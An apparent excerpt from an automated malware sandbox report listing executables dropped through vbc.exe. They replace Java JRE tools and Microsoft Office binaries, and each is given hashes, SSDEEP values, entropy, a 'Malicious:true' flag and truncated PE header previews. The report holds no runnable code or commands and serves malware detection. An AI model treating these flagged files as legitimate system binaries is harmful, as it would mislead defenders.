                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................h.......................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1142272
                                                                                                                                                                    Entropy (8bit):5.033002535646008
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:uKl2Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:P0sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                    MD5:C4A15AA44201BC7073D9D4A3B317E232
                                                                                                                                                                    SHA1:FC2AB97779C003BBA135297B4BBE5043498B16BA
                                                                                                                                                                    SHA-256:ACB94C61F97571614A0820EB857F621DDB4AF986D51DDEC281155E0875F2620F
                                                                                                                                                                    SHA-512:8FBE97F7522C26977E3F07729305FB864C99CCB9ACA69E559776CEE98F319ABF9E14799C781A82EBC3EA3EA4110496A1EBF03BA9D31319CFCF210E8AF318CC36
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................,........................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1142272
                                                                                                                                                                    Entropy (8bit):5.033000943068155
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:qil2Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:70sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                    MD5:164AFCA90EFE5E1FEA58AE513A0E48B4
                                                                                                                                                                    SHA1:65E5CD20B58A4F74B117F0238AE9ABB7AD21C06F
                                                                                                                                                                    SHA-256:66C8422C5979170ED28893FAEC3C7927DAB990C0723C2B878AAE76C3FBE6698C
                                                                                                                                                                    SHA-512:F9DCB1EAD3B80FF4BC560FEF2D00E474824CF94EC9ED38D3CDB951C8C846062B16FE59A387B844D8BAC61A773BCE14CB6681D5E5C1CDB94DB87FCB088A0D498A
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................T .......................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1142272
                                                                                                                                                                    Entropy (8bit):5.03297280481134
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:gTmWXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:67sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                    MD5:E59D630134E88B32C6992D11CFC85DA1
                                                                                                                                                                    SHA1:05388A3004250D344BC0B6C08DDFC44F08F0AAFC
                                                                                                                                                                    SHA-256:74A44AD51E6E2C06E90DADC63A5C28A0759FBC6C14C14FF9E7859E3D5A3E3C7B
                                                                                                                                                                    SHA-512:B1DF057F18D9E905649CB953A5DB54644536015F747FA946AD07459411BFD057FBAF80BC793E6E01B4DE63F8250E0403C4FA082B289E08B55973C7DFE910CF2A
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................W........................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1142272
                                                                                                                                                                    Entropy (8bit):5.033892827601967
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:namSXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:avsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                    MD5:628B5449C309D20E951E39D9A0246055
                                                                                                                                                                    SHA1:1D6E0A65A6B11BC8CD77B1C2D429E61B2D772234
                                                                                                                                                                    SHA-256:A23F40D30A7513766CA1C58023E8BE052B54D659C1D0B8D959B262B96F19D1C4
                                                                                                                                                                    SHA-512:BDCB37FB1295B7FF7095F4CD446CF174E92B26063E2D86ECD6C8F7156ADB6EB59E05A48460D72A9D24F61BE425A784AA921446CE4EB19BD12123D1D3EFB3BE52
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.........................................................................D'.......@..P........................... #..T...........................`"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1142272
                                                                                                                                                                    Entropy (8bit):5.032947051083148
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:JQ5eXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:6AsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                    MD5:6020C26D5FF8F4B795AECD215620E40D
                                                                                                                                                                    SHA1:51ADFA5CE884FEF2C1FE670C709583767CF0C0B2
                                                                                                                                                                    SHA-256:0A6952148C7B003532796F1490BB27A2907FFE587BFA5AE40048E07980569A42
                                                                                                                                                                    SHA-512:BB36F98FF8F3EEC1EC7B9458B708DAF4E0699F884D4696E485059B3E5CF8658EE1F3032F1ADA18E374F9FCC756A20086214614DBC0BCC6B8775C9F2F1E72B2B7
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................M........................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1142272
                                                                                                                                                                    Entropy (8bit):5.024640957579667
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:7eRVldlnXfH9gPwCn7vOb7HHcp/CGXQp:qRVlbnXf9gPTTW7H1GXC
                                                                                                                                                                    MD5:CAD637EB2FFD660CF3BF73B6AC5E6E68
                                                                                                                                                                    SHA1:E0F3C86F1AEF9E7536F540C87BEAE3A54DC68A4A
                                                                                                                                                                    SHA-256:F5A868A80D7C11483D9FE09F708F16B27FC215106FF1F6983913DA7D3B6D8EEB
                                                                                                                                                                    SHA-512:437EEE8B7F3E875DD5D4E1EB09CB3B2CD6512419025EC9B13F227C9D49BC640B0E6E5E9FB5DD22BC3E863E0207E502A2449320A1F7596AD1ABC3E1BE7C4D5C3A
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1142272
                                                                                                                                                                    Entropy (8bit):5.024537477094705
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:ehRVldlnXfH9gPwCn7vOb7HHcp/CGXQp:QRVlbnXf9gPTTW7H1GXC
                                                                                                                                                                    MD5:2B266884D8985902DDEACCCC1C39988B
                                                                                                                                                                    SHA1:65ECDF9DEBC68B456495CA5D98D6FB72C9DE811E
                                                                                                                                                                    SHA-256:5E4C3C21C5BF07C1C686ACA465DF6F16A711D6BF94123484FD661AA377471782
                                                                                                                                                                    SHA-512:C729D8EC7736BEBED0816F09508F3E0EA50680B50A326C6BA2BA6E37569D71132F468DC78BBADA8A1B43C0611678D1F7727F2C8E6CBF61DC762295F0ADACF3B0
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................-3.......................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1142272
                                                                                                                                                                    Entropy (8bit):5.024577215862778
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:ZVRVldlnXfH9gPwCn7vOb7HHcp/CGXQp:fRVlbnXf9gPTTW7H1GXC
                                                                                                                                                                    MD5:D68197CB7A969ABEBBDF7FA11F15C46B
                                                                                                                                                                    SHA1:2BE9A213F2C501243E3232A3918F98C62B9B6CDD
                                                                                                                                                                    SHA-256:C67F8A9CED2A05582C76F276FECC4181C22D37AA1EC1BFA66FDBC3ECE29CA3BF
                                                                                                                                                                    SHA-512:BD5A05EAC90BD6E957EEE566389DAB22248BD4EB48FE72EFA5179E06D77AAE050B21D0E94E9DCA8973D672A73FF6A0167E20E14D1B6DF1791C2E8DA9370771A9
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................<>.......................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1142272
                                                                                                                                                                    Entropy (8bit):5.024653898378948
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:meRVldlnXfH9gPwCn7vOb7HHcp/CGXQp:TRVlbnXf9gPTTW7H1GXC
                                                                                                                                                                    MD5:FADC2A132A30172856F6E57111C4B6B3
                                                                                                                                                                    SHA1:7FFB8C6F05F3E8215CA92ED04F5097FF8448FD8A
                                                                                                                                                                    SHA-256:4DF575272BABB5AE697AFED47F2A30A89FEF139A95A841E1CBC4ECDB7EF9DC14
                                                                                                                                                                    SHA-512:6CD008277749088C770A479CEF56ACA397F6DD4D2448E35077E86A244BEB39121489F325C28E310E617A143B651F1612E16AD3205B6FBB894A219145879CBE72
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1202688
                                                                                                                                                                    Entropy (8bit):5.089835278164136
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:+7QRVldlnXfH9gPwCn7vOb7HHcp/CGXQp:+8RVlbnXf9gPTTW7H1GXC
                                                                                                                                                                    MD5:920C166D7A03F901C3948508994B94A4
                                                                                                                                                                    SHA1:F6E43358F2418672ABF1957BE665D45A724A2782
                                                                                                                                                                    SHA-256:D26F690006771FF640426D7FF69B2F5DD1F2F8795D6ECFACA685AC03B3109A39
                                                                                                                                                                    SHA-512:FF5F8DA9B036B3CDA780EBAB33F0115F580AB05090D48E9B7FF2BF46B11FBB354E608B78A2D118711E647B9D02D32C291874E27F8F9DD0E9C70B0610E30182AA
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......zGG.>&).>&).>&).7^..*&).\^(.<&).\^-.3&).\^*.=&).*M-.?&).*M(.7&).>&(.&).\^,..&)._,.:&)._..?&)._+.?&).Rich>&).........PE..L...M.d.................|...........u............@.................................(X..........................................@....0..............................H...T...............................@...............P...P........................text...L{.......|.................. ..`.rdata.............................@..@.data........ ......................@....rsrc........0......................@..@.reloc...P...@...@..................@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1142784
                                                                                                                                                                    Entropy (8bit):5.02398565320506
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:qHRVldlnXfH9gPwCn7vOb7HHcp/CGXQp:0RVlbnXf9gPTTW7H1GXC
                                                                                                                                                                    MD5:DC861DFB2C0505A181FFE8C97ACD696F
                                                                                                                                                                    SHA1:231EDEFBF792B79F39433259C78C26C0F28F2F10
                                                                                                                                                                    SHA-256:A2774925DEA2B93178BA93E110836F76A341CB9924E7E6D48CA37454EABCD46D
                                                                                                                                                                    SHA-512:75C639482103F4572F1DC99EFCDCB3B18AE50F1F5C2AC131DC1C02FE8CF4B1201F196BD67AD6D739EEC389B5432896BF9CEC7AA682061DF6F60D83FE0CCCF516
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................... ............... ....@.................................UZ.......................................'.......@..h...........................8#..T...........................x"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......."..............@....rsrc...h....@.......$..............@..@.reloc...P...P...@...0..............@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1298944
                                                                                                                                                                    Entropy (8bit):5.241338551400746
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:8i7l/3roAsRVldlnXfH9gPwCn7vOb7HHcp/CGXQp:Xl/roAsRVlbnXf9gPTTW7H1GXC
                                                                                                                                                                    MD5:41F9423776769B73AACEEE8707FDA6C1
                                                                                                                                                                    SHA1:319D3D3DF3F80F579F15E336957ACAB2E56DF668
                                                                                                                                                                    SHA-256:7CE07079A638554E78253A5D61981F10FC6FB9B9BB73D141D13044300B6F2C57
                                                                                                                                                                    SHA-512:542B52E0E6F8E9546773BCEFCBC7665B0C394AF27CEF8A11F0C4C5D4B683C89BAC5DD0206062FEDC9B1B17DBF3D4213537598722DC8E9B27EFA2D1588072428A
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........n...........................................................................................Rich............................PE..L.....d............................A.............@..........................0..........................................................D............................e..8............................e..@............................................text...D........................... ..`.rdata..5...........................@..@.data................f..............@....idata...............v..............@..@.00cfg..............................@..@.rsrc...D...........................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1269248
                                                                                                                                                                    Entropy (8bit):5.279098752362309
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:iNfQnYRVldlnXfH9gPwCn7vOb7HHcp/CGXQp:osYRVlbnXf9gPTTW7H1GXC
                                                                                                                                                                    MD5:AA3D2B5DC8538715B6CCF1051E29E237
                                                                                                                                                                    SHA1:3210183293FA3B1187ECC8632FFD21D83812748B
                                                                                                                                                                    SHA-256:61D910D63432C365BA2EFA17B169CD5235C2C61B7EB44DC5B3AA304CC57587E3
                                                                                                                                                                    SHA-512:8C14227E62D40E94E72C9E1991ECE00BAE672111000F597C5C08A7DEAA5DAF7D33C6D9B18050B12402B2A928B95C67C7BC054CC6ECF02162EB33EED737E49F07
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X.u.....................|.......|.......|.......|...?.......................................y.......y.......y.......Rich............................PE..L...-1.e............... ..........................@.................................8W......................................d...........................................8...............................@...............,............................text............................... ..`.rdata..4a.......b..................@..@.data........ ......................@....reloc...`...@...P..................@...........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1287680
                                                                                                                                                                    Entropy (8bit):5.294729745535157
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:XLikRVldlnXfH9gPwCn7vOb7HHcp/CGXQp:JRVlbnXf9gPTTW7H1GXC
                                                                                                                                                                    MD5:A9A5962A33C412E772BEBB9B8F25B2BA
                                                                                                                                                                    SHA1:5BCA570BCED716483EC539DEAC5C5607BB951983
                                                                                                                                                                    SHA-256:F3057EFC46376331154E497B80C577B84A1A8C089D87FDF107109B83F329CC55
                                                                                                                                                                    SHA-512:36ECF677672368A8CD46AD720C69993290BED7639DDDF90FE973C199ECFCC02B410B2E3AE7C69437BAF7F55448D655B6C9C19E4AD16FD43875117BEF0C0ACBD1
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a*.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@.............................................. ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.......*..............@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc...p...p...`...F..............@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1287680
                                                                                                                                                                    Entropy (8bit):5.294741180860204
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:kLikRVldlnXfH9gPwCn7vOb7HHcp/CGXQp:YRVlbnXf9gPTTW7H1GXC
                                                                                                                                                                    MD5:DDA8AD019DC9EF7DB00131460AB8C5E7
                                                                                                                                                                    SHA1:403C35483AF686C58843849275245BC86C41D37D
                                                                                                                                                                    SHA-256:BD6CB95E44694E95DEF5120C41BC6C9A3C0054DED636D1F1EF4D2D211B5C6001
                                                                                                                                                                    SHA-512:66021EF9EFA828D337655E08961A7EE5F36C571F85AD8A6E2F64B055E54DF0022872D9C718975228A09D55456BC73CB92464ACF2845B1D05D1B25B1469F6A07B
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a*.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@.............................................. ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.......*..............@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc...p...p...`...F..............@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1343488
                                                                                                                                                                    Entropy (8bit):5.228133943442697
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:efkRVldlnXfH9gPwCn7vOb7HHcp/CGXQp:efkRVlbnXf9gPTTW7H1GXC
                                                                                                                                                                    MD5:63638881E14CA9E4ABECC110EA5611C8
                                                                                                                                                                    SHA1:634D74AC60978926F2BE2C6DE4BE75742FAA5EA0
                                                                                                                                                                    SHA-256:616771D792B1263F80E1E3D67E11C4520687A4620B901D889C38D9FBF1A2A7C3
                                                                                                                                                                    SHA-512:3F7E466314D5F36C46FEA8C50243342A584C55B75C8DA9C1E16866E6D36AF59301BC8F284D0534331D04C78AB6647FB15AC1FDD9C1A0E3938176C20515205F30
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... .(.d.F.d.F.d.F.m..l.F...B.h.F...E.`.F...C.{.F...G.c.F.d.G...F...N.M.F.....f.F.....e.F...D.e.F.Richd.F.................PE..d....~0/.........."..........P.................@....................................Q..... .......... ...................................... ........ ..(...............................T....................e..(...`d..8............e...............................text............................... ..`.rdata..............................@..@.data...@...........................@....pdata..............................@..@.rsrc...(.... ......................@..@.reloc...p...0...`... ..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1496064
                                                                                                                                                                    Entropy (8bit):5.570607965848301
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:jbUO42i/E7RVldlnXfH9gPwCn7vOb7HHcp/CGXQp:jJ7RVlbnXf9gPTTW7H1GXC
                                                                                                                                                                    MD5:4687D73E99FCF600C6E9DB8593BE22E1
                                                                                                                                                                    SHA1:B873A344AF3B41A881C82F61A3386D7D2EBA2C38
                                                                                                                                                                    SHA-256:0988AAC03A5F0D1B99D7330E8EF815298669C716FA8998FAD963F8F78CCBCBF8
                                                                                                                                                                    SHA-512:F498CC7DE8A5997E65756526AAEAD9B0138AB4343350DBF7FD4FAA2AA417453A1E3FA74ECC62A2A11655B04ECE6AE508BAFCDD5C6A76A34D743B16037983BCD8
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X..i.v.:.v.:.v.:...;9v.:...;.v.:...;.v.:.v.:.v.:...;$v.:...;4v.:...:.v.:...;.v.:Rich.v.:........................PE..L......m.................0...|...............@....@.......................... ................... ......................................................................T...................`[..........@............p...............................text...l/.......0.................. ..`.data...@'...@.......4..............@....idata..@....p.......L..............@..@.c2r.................\...................rsrc................^..............@..@.reloc...........p...d..............@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):52712960
                                                                                                                                                                    Entropy (8bit):7.9617757487388445
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1572864:ALjL44lyBc+UN0qRsMjDAY9d5o/paLXzHLe:sicZmsR3Lo/cnLe
                                                                                                                                                                    MD5:A86CE03D6283A2E451A7F31436D371E4
